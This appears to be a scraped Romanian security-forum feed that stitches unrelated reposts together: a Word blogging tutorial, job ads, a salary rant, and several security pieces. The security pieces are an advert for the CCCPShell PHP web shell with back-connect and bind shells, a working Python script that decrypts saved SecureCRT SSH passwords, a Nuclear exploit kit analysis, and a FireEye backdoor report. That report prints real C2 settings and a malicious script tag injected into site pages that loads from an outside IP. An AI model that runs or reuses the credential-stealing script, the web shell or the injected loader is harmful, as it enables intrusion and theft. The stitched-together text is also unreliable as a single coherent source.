How to start blogging with Microsoft Word Alex Castle Sep 15, 2014 3:30 AM Blogging with Microsoft Word lets you use the richly featured word processor to circumvent many of the underpowered, sometimes unfriendly aspects of browser-based interfaces used by platforms like WordPress or Blogger. We'll show you several ways to write and publish blog posts directly from Word, using the tools and shortcuts you already know. While the this tutorial is written for Word 2013, the necessary features are available in all versions starting from Word 2007. WordPress WordPress is a super-popular, open-source blogging platform that’s designed to be flexible, customizable and user-friendly. WordPress is also very easy to use with Microsoft Word. If you haven’t already set up a WordPress blog, you can do it in just a few minutes. Just visit WordPress.com, pick a URL that’s not taken yet, and fill in some basic personal info. WordPress will try to upsell you to the $25-per-year hosting, but if you decline you’ll still have unlimited free hosting and a “[something].wordpress.com” domain name. You’ll be asked to pick a theme for your site, connect a social media account, and write an introductory post. You can skip the latter two steps and go back to change any of this stuff at a later time. Creating a WordPress blog is easy and intuitive on WordPress.com. Setting up a WordPress blog on your own web server isn't much harder, but takes little more time. You can also download and install WordPress on almost any web host. Many hosts have scripts that handle the setup for you, but you can always visit WordPress.org to download a copy of the software. (Note that the .org website is dedicated to the WordPress software itself, while the .com website is the hosted service.) After a quick confirmation of your email address, you’re ready to begin writing your first blog post. Open up Word and click File > New. From the templates menu, choose Blog Post and click Create. Crafting blog posts in Word provides a familiar interface and set of tools. Not all of Word's functionality is available, though. Click the button at the top left of the window marked Manage Accounts. In the dialog that pops up, you can add any number of accounts and choose which one to publish to. Click New Account and choose WordPress from the dropdown menu. You’ll be asked for your blog’s URL (enter it without the “www.”), account name, and password. Once you’ve done that, just use the formatting tools in Word to write as you normally would. When you’re done, click the Publish button in the top left. Your post will be uploaded to your WordPress blog. When viewed in a browser, WordPress posts crafted in Word will look as you expect them to. Spacing and colors are subject to the the theme you choose for your Blog, however. If you’d like to upload it but not make it public yet, click on the arrow under Publish and choose Publish as Draft. You’ll be able to find the post in your WordPress posts list, and you can publish it whenever you want. Blogger Another popular blogging platform is Google’s Blogger. Google account integration is obviously one of its advantages over WordPress, but Microsoft Word’s integration with the service isn’t quite as polished. Word can’t upload images directly to Blogger, for instance—you’ll have to go into the Blogger CMS (content management system) and add them manually. To get started, go to Blogger and log in with a Google account. The default setting is to link your Blogger blog to your Google+ account, but you could also choose to log in with a limited Blogger account. You’ll still log in with your Google account, but you can pick a new user name for the Blogger profile, and the two won’t be publicly linked. Creating a new Blogger blog is very simple, especially for the Google faithful. Next, you’ll see the Blogger dashboard, which shows you a (still empty) list of blogs you own. Click the “New Blog” button. Like WordPress, you choose a domain name as well as a theme for your site. Click “Create Blog,” and you’re ready to post. Back in Word, you can post to Blogger the same way as in the WordPress section above—just click File > New > Blog post and add your Blogger account information in the account manager. Because you can’t automatically upload images to Blogger using this method, your posts will have to be text-only. Still, you can use Word’s text-formatting options, such as headers, bold and italics and text alignment, and that will carry over to your blog post intact. Using other platforms Although WordPress and Blogger are better suited to fledgling bloggers, a few other blog platforms work with Microsoft Word’s publishing capability, including TypePad, and Microsoft’s own SharePoint. Here’s the trick you can use with alternative blogging platforms. Normally, if you copy and paste text from Word into a browser-based editor, the post will be utterly, irrevocably messed up by Word's usually-invisible formatting data, which turns into gibberish when you copy it into a different editor. Copying the Word text into a plaintext editor like Notepad strips out all the formatting data. Next, copy the text from Notepad into the target editor (like a web form). This will keep your post from breaking, but it strips out all the formatting, which kind of defeats the purpose of using Word in the first place. Converting your Word document to Google Docs format will strip out the parts of the Word document that don't translate well to a copy-and-paste. You can strip out the junk data without removing the formatting by using Google Drive. Just save your draft as a .doc or .docx file, then upload that to your Google Drive. Open the file using Google’s web-based word processor, Docs. The processor will automatically convert the word file into blog-friendly HTML, and you can copy-paste the whole post from the Google editor to your blog platform of choice, keeping all your formatting. This trick won’t work for all browser editors, and you might have to make a few corrective tweaks. Still, it’s a lot easier than reformatting a long post from scratch. Sursa: How to start blogging using Microsoft Word with WordPress or Blogger

CCCP Shell CCCPShell is a PHP Shell written from scratch in my spare time. You will find in this shell Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals) PHP zip with php code Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo) 21 icons for use in 94 file types CSS3 Easy to translate to another language via tText function WIP All the standard shell stuff Encrypted comunication (first phpshell in the world???) All tools Filemanager [+] Copy/paste (recursive) [+] In memory compress and download (recursive) [+] Delete (recursive) [+] Create file/folder [+] Fast view folder size/count objets [+] Fast file rename [+] Fast chmod [+] Fast change filedate [+] Create file/folder [!] View file information [+] Full Path [+] Size [+] MD5 [+] Chmod/Chown [+] Create time [+] Access time [+] Modify time[+] Hexdump preview/full [+] Highlight code [+] File Content [!] Edit [+] Change filetime [+] File Name [+] Change content Procs [+] Process viewer/info [+] Process killer SQL [+] Database explorer [+] Execute SQL code Info [+] Server info [+] PHP Info [+] Custom functions check External Connect [+] Back Connect [+] Bind Shell Execute [+] Eval PHP code [+] Execute (exec, shell_exec, system, passthru, popen and proc_open) Self remove WARNING This shell use atob an btob javascript functions. Read if your browser support it https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob Images Sursa: https://github.com/xchwarze/CCCPShell Via: TrojanForge

Pentru un nou proiect ce presupune dezvoltare de aplicatii desktop pe MAC si Windows, clientul nostru isi doreste un Programator C++, cu experienta pe framework-ul Qt, care va face parte dintr-o echipa de 5 persoane. Postul este deschis atat in Bucuresti, cat si in sediul din Iasi. Cine e interesat sa imi dea PM.

Va trimit mai multe informatii in legatura cu oportunitatea de Embedded Software Developer pentru locatia Bucuresti, pentru unul din proiectele noastre care activeaza in domeniul automotive. PM cine e interesat.

Nu e asta ala de zicea ca el castiga 140 de milioane pe luna? E cumva in Amsterdam si a tras chestii dubioase?

Da-ne mai multe detalii. Ce anume faci acolo? Ce limbaje cunosti? In ce limbaj lucrezi cel mai mult? Cine ti-a dat 40 de milioane initial? Cine iti dau 140 de milioane? E vorba de Romania? Cati ani ai? Cati ani de experienta ai? Ai pile la stat? Atat primesti in mana, adica salariu net?

Super tare! Am castigat 10$ in doar 2 saptamani! BRB, imi iau DOUA pachete de tigari!

Ba. Cine pula mea credeti ca sare pe voi cu banii? MUIE! Nu ati scris in viata voastra 200 de linii de cod si va asteptati la salariu de 50 de milioane. Porstilor. La inceput nu va da nimeni mai mult de 1500-2000 indiferent de limbaj. Mai ales ca te duci acolo cu un CV pe care scrie: "Vai, stiu 42 de limbaje de programare" si atat. Proiecte la care ai lucrat? Pula. Toate sunt rentabile. In orice limbaj poti castiga pana la 2000-2500 de euro pe luna. Dar asta cand ajungi Team Leader, Manager sau ai o alta functie de conducere. Intre timp, incepi cu 1500 RON (nici pe astia nu ii meritati) si cresti treptat. Sa zicem asa: 1500 RON - cam 6 luni -1 an. Ajungi apoi pe la 20 si ceva de milioane, apoi 30 de milioane. Si dupa macar 2 ani de experienta sa aveti bunul simt sa cereti mai mult de atat. Se poate creste si mai rapid, depinde de firma la care ajungeti si cat de buni sunteti. Nu va mai luati dupa ce spun altii ca ei castiga 80 de milioane pe luna. Se castiga, dar dupa multi ani de munca. Ala a muncit poate 5 ani sa ajunga la salariul asta, voi ati dat 5 ani la laba, nu ati facut nimic si mergeti la interviuri mirandu-va ca va scot aia pe usa cand discutati de salariu. Cat despre limbajul de programare, alegerea e simpla: alege ce iti place. Intotdeauna o sa fii bun in ceea ce iti place sa faci. Asa cum esti bun la jucat jocuri de cacat, asa o sa fii bun in C++ daca iti place asta. Dar inainte de a va gandi macar sa va angajati, faceti-va CV-ul si ganditi-va ca aveti o firma si vine un pusti cu acel CV la voi si discutati de salariu. Asa o sa va dati seama cat meritati. Nota: Daca sunteti olimpici sau buni in ceva puteti castiga din start mai mult. Sa zicem ca luati din start 40 de milioane pe luna. Dar asta vine cu alte neajunsuri la pachet: 1. NU o sa vedeti o marire de salariu 2. NU aveti voie sa plecati de la firma respectiva timp de 2 ani E doar un caz, mai mult sau mai putin real. Daca o firma va ofera salariu mare, fiti siguri ca ceva nu este in regula si cititi contractul inainte de a-l semna. @2time - Care a fost primul tau salariu? @gogusan - Ti-au dat tie primul salariu atat pe Java? Aici e vorba de primul salariu. Nu mai veniti aici cu astfel de numere sa le faceti iluzii copiilor. Nota: O ruda de-a mea castiga 1500 RON pe luna ca femeie de serviciu. Programarea nu mai e ceea ce era acum cativa ani. Sunt MII de oameni ba, MII de oameni care termina o facultate de profil (daca nu ai facut Universitatea sau Politehnica in Bucuresti nu se uita nimeni la CV-ul taude Spiru Harte). Ce-i drept, majoritatea sunt niste cacati care nu invata nimic si doar se asteapta la miliarde pentru ca termina o facultate de cacat. Dar pentru angajator conteaza ca vine un cacat dintr-asta si cere cu 3 milioane pe luna mai putin. Asadar: 1. Lucrati la proiecte. Lasati laba, serialele si jocurile. Munciti! Construiti-va un CV, sa aveti ce arata aluia cand ziceti ca vreti o gramada de bani de la el. 2. Faceti o facultate buna. Nu Spiru Haretu pulii sau altceva. Conteaza mai mult decat credeti. 3. Invatati! La facultate sau acasa, invatati pentru ca la interviu se pun intrebari tehnice, interviuri care dureaza chiar si 3-4 ore. Nu va mai luati dupa toti prostii care posteaza aici, care au 15 ani si traiesc pe banii parintilor.

Decrypt SSHv2 passwords stored in VanDyke SecureCRT #!/usr/bin/env python# # Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files # Can be found on Windows in: # %APPDATA%\VanDyke\Config\Sessions\sessionname.ini # Tested with version 7.2.6 (build 606) for Windows # Eloi Vanderbeken - Synacktiv from Crypto.Cipher import Blowfish import argparse import re def decrypt(password) : c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4]) p = '' while padded[:2] != '\x00\x00' : p += padded[:2] padded = padded[2:] return p.decode('UTF-16') REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)') REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)') REGEX_PORT = re.compile(ur'D:"\[sSH2\] Port"=([0-9a-f]{8})') REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)') def hostname(x) : m = REGEX_HOSTNAME.search(x) if m : return m.group(1) return '???' def password(x) : m = REGEX_PASWORD.search(x) if m : return decrypt(m.group(1)) return '???' def port(x) : m = REGEX_PORT.search(x) if m : return '-p %d '%(int(m.group(1), 16)) return '' def username(x) : m = REGEX_USERNAME.search(x) if m : return m.group(1) + '@' return '' parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files') parser.add_argument('files', type=argparse.FileType('r'), nargs='+', help='session file(s)') args = parser.parse_args() for f in args.files : c = f.read().replace('\x00', '') print f.name print "ssh %s%s%s # %s"%(port©, username©, hostname©, password©)

Foloseste-l dintr-o masina virtuala. Si ESTE un keylogger.

Zeroing buffers is insufficient On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so — and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem. With a bit of care and a cooperative compiler, we can zero a buffer — but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers. Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2). Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault — but that is an extreme solution, and is both non-portable and very clear C "undefined behaviour".) One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications — so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set. It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak — the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES — but the situation is very different for decryption operations: The final block of output is plaintext, and the final AES round is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertantly keeps an AES key sitting in an XMM register long after it has been wiped from memory. As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code — which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine. Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C. If compiler authors care about security, we need a new C language extension. After discussions with developers — of both cryptographic code and compilers — over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that that compiler knows precisely how much space it has allocated. With such a feature added to the C language, it will finally be possible — in combination with memset_s from C11 — to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions. Sursa: Zeroing buffers is insufficient

Copyright Duarte Monteiro (etraud123) JSPwn Nishant Das Patnaik (nishant.dp@) JsPrime Paul Theriault (pauljt) Scanjs JSpwn JavaScript Static Code Analysis JSPwn is a modified version of Scanjs + JSPrime. This tool allow the developers to detect Sinks And Sources of their Applications and find XSS vulnerabilities and DOM XSS (Beta). With the engine of ScanJS to detect vulnerabilities and the code flux feature of JSprime, this app has the compatibility of detect the vulnerabilities point and backtrack the code. Example Open app: node server.js; Go to: http://localhost:4000/client/#/scan; Select File from folder; Enable REGEXP Custom; Link: https://github.com/Etraud123/JSpwn

[h=3]Nuclear Exploit Kit and Flash CVE-2014-0515[/h] For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit kit targets a number of known vulnerabilities including: pdf - PDF:Exploit.PDF-JS swf - CVE-2014-0515 jar - CVE-2012-0507 Below are the files which were downloaded during the exploitation attempts observed: [TABLE] [TR] [TD]FILE TYPE[/TD] [TD]MD5[/TD] [TD]SIZE[/TD] [TD]CVE/THREAT[/TD] [TD]VT HITS[/TD] [/TR] [TR] [TD]FLASH[/TD] [TD]A1465ECE32FA3106AA88FD666EBF8C78[/TD] [TD=align: right]5614[/TD] [TD]CVE-2014-0515[/TD] [TD]18 / 53[/TD] [/TR] [TR] [TD]JAR[/TD] [TD]A93F603A95282B80D8AFD3F23C4D4889[/TD] [TD=align: right]12396[/TD] [TD]CVE-2012-0507[/TD] [TD]26 / 54[/TD] [/TR] [TR] [TD]PDF[/TD] [TD]19ED55EF17A49451D8052D0B51C66239[/TD] [TD=align: right]9770[/TD] [TD]Exploit.PDF-JS[/TD] [TD]22 / 54[/TD] [/TR] [TR] [TD]EXE[/TD] [TD]8BCE8A59F9E789BEFB9D178C9A03FB66[/TD] [TD=align: right]104960[/TD] [TD]Win32/Zemot[/TD] [TD]39 / 53[/TD] [/TR] [/TABLE] Although there are other associated vulnerabilities that are being exploited by Nuclear Exploit kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515). Nuclear EK Landing Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and if finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a javascript function then checks the installed Flash version and if a vulnerable version is detected on the client's browser, a call is then made to a dynamic Flash object creation module. (Fig 4: Flash Call) Here are the vulnerable Flash player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below. CVE-2014-0515 exploit analysis Here is the code that dynamically creates a new Flash Object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard coded snippets of obfuscated shellcode in the action script as seen below: (Fig x1,x2: Raw Shellcodes) After de-obfuscating on the run time, it adds bytecode to a Shader Object from one of the de-obfuscated shell code snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed byte code is written, which triggers the vulnerability. Here is the Malformed byte code: (Fig 9: Malformed data for Pixel Shader) Disassembling Pixel Bender's byte code We used Tinc Uro's program to get the PixelBender binary data decompiled. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here. The Shader Object takes a float parameter whose default value is set to a matrix of 4x4 floats and the second float value of this matrix is invalid value triggering the vulnerability. Conclusion Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new Exploit Kits. Nuclear Exploit Kit definitely ranks in the Top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK includes: SocialBlade.com - A youtube statistics tracking site. AskMen.com - Men's entertainment website Facebook.com survey scam pages Exploit kits generally make use of known vulnerabilities and Flash is a popular target. CVE-2014-0515 in particular targets a Flash vulnerability in Flash versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It's critical to ensure that your employees aren't running outdated versions of Flash as it is commonly targeted by EKs. References: Adobe ActionScript® 3 (AS3) API Reference http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf kaourantin.net: Pixel Bender .pbj files JPEXS Free Flash Decompiler - Download Malware-Traffic-Analysis.net - Rubin Azad Sursa: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515

Forced to Adapt: XSLCmd Backdoor Now on OS X September 4, 2014 | By James T. Bennett and Mike Scott Introduction FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform. Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums. In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X. And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X. Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report. Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGO’s, especially those with interests in Asia. XSLCmd for OS X Analysis The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons). The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing. Installation Routine To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid()with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs. The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed. The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog. Configuration Options XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands. If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained. [ListenMode] 0 [MServer] 61.128.110.38:8000 [bServer] 61.128.110.38 [Day] 1,2,3,4,5,6,7 [start Time] 00:00:00 [End Time] 23:59:00 [interval] 60 [MWeb] http://1234/config.htm [bWeb] http://1234/config.htm [MWebTrans] 0 [bWebTrans] 0 [FakeDomain] www.appleupdate.biz [Proxy] 0 [Connect] 1 [update] 0 [updateWeb] not use [MServer] and [bServer] specify the main and backup C2 server addresses, which can be either an IP address or domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates on where Monday is 1. [start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [interval] specifies the number of seconds between polls. [MWeb] and [bWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left to their default: http://1234/config.htm Other options will be explained where appropriate later in the blog. C2 Protocol XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to setup the HTTP request or response headers depending on whether or not it was configured for [Listen Mode]. If [Listen Mode] is set to 1, then it listens on its socket, waiting for a connection for which it will reply to with HTTP response headers following this template: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Server: Apache/2.0.54 (Unix) Content-Encoding: gzip Content-Length: %d The body after the headers, regardless of mode, will contain data specific to the purpose of the communication. The data is encrypted with a scheme lifted from a game server engine written by a group named “My Destiny Team.” The request headers have an interesting feature where the Host and Referer header values will have their domain values populated with the value stored in [Fake Domain]. This value can be any string and has no effect on the network connection established. The value of the ‘s’ argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded. Another interesting feature exists for the configuration update function. If [MWebTrans]/[bWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo’s Babelfish service and will fall back to the Google Translate service if that fails. As you can see, the ‘trurl’ parameter in the URL will be set to whatever is configured for [MWeb]/[bWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end. SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [Listen Mode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases. Observations We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes side-by-side in the same function even. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes. Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash. The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code, the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6 released in 2009, and OS X 10.9 was released in October of 2013. Threat Actor Intelligence Historical Background While GREF’s targeting interests overlap with many of the other threat groups we track, their TTP’s are somewhat unique. GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks. GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits including CVE-2010-0806 (IE 6-7 Peer Objects vuln), CVE-2010-1297 (Adobe Flash vuln), and CVE-2010-2884 (Adobe Flash) that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites including Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did. Figure 1: Sample “google” exploit link <!— Google Tracking Code —> <script type=”text/javascript”> var gaJsHost = ((“https:” == document.location.protocol) ? “https://ssl.” : “http://”); document.write(unescape(“%3Cscript src=’” + gaJsHost + “180.149.252.181/wiki/tiwiki.ashx’ type=’text/javascript’%3E%3C/script%3E”)); </script> The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities to both gain entry to targeted organizations, as well as to get new platforms for SWC attacks. This threat group appears to devote more resources (than most other groups) in attempting to penetrate web servers, and generally, they make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system. Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges to both perform reconnaissance and launch their attacks, as well as for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom – Hong Kong), 180.149.252.x (Asia Datacenter – Hong Kong), and 120.50.47.x (Qala – Singapore). In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as “inurl” and “filetype” looking for specific systems, technologies, and known vulnerabilities. C2 Domains GREF is known to have sometimes configured their malware to bare IP addresses, rather than domains, but there are some clusters of domain registrants that we attribute to them. Table 1: GREF domain registrations [TABLE] [TR] [TD]Domain[/TD] [TD=width: 221]Registrant Email Address[/TD] [/TR] [TR] [TD=width: 221]allshell[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kasparsky[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kocrmicrosoft[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoft.org[.]tw[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftdomainadmin[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftsp3[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]playncs[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] 